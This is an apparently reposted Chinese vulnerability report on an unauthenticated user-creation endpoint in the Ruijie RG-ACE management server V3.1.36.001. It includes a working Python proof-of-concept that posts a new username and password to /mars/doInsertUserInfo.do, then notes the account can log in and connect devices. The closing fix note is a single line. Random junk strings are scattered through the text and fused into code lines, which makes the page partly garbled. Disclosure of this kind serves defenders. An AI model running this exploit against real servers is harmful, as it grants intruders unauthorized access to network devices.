锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
0 I# Z2 c& M" H
+ H: D( S" h4 `9 r; U
测试的具体版本是
0 D" {  o4 Y8 z0 u' W% T  d产品名称: 锐捷应用控制引擎
3 }/ J1 {5 L5 J, j' ?0 |- Z( J版本号: 3.1.36.001 TC
编译时间: 201104291730
2 H6 `/ [8 Z6 K/ S; a3 J

漏洞证明：






# j, t, Q( Z2 Q! t) W4 T执行脚本
#! /usr/bin/env python
9 b9 i( k* e/ o8 m2 H% ^#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
( U$ V* M! X1 P( f+ {url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
8 F/ j3 p! c# }& i8 lopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
0 u; P8 s/ M2 h: z2 m  z+ o1 z5 npost=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
' y% R1 q# Z+ e8 E9 S("useropermanager","userManager"),
("userName","t"), #######账号自己加
  |* `0 R! y: m3 L# e("pwd","aaaaaa"),######密码自己加
' R+ m7 A' i6 }* ^8 X("trueName","ad"),
( w' U# [7 M& k  `9 l- M" j. ~' N' d3 V("email",""),
: z. m) a% R' Z+ a/ d("mobilePhone",""),
("officePhone",""),
("addr",""),
3 h/ [. T; {" M, r: h# A! U("submit","确定"))
$ T6 d; `( k3 |3 Vurllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
- ^, Y" b1 _$ `+ ?4 Cprint "Done"

+ G9 q+ o0 R: }# l* Z$ ?1 Y1 n登录，连接设备


1 l2 f& \5 l0 w# f
, i. U+ h& E2 R* w$ v, A

; I% Z! Q0 `; b/ Z: |# v. L默认的管理员admin权限更大点



' @4 H: L. H+ g9 F' B4 D* E

修复方案：
, X# ^( V. ]" s加强对接口的权限验证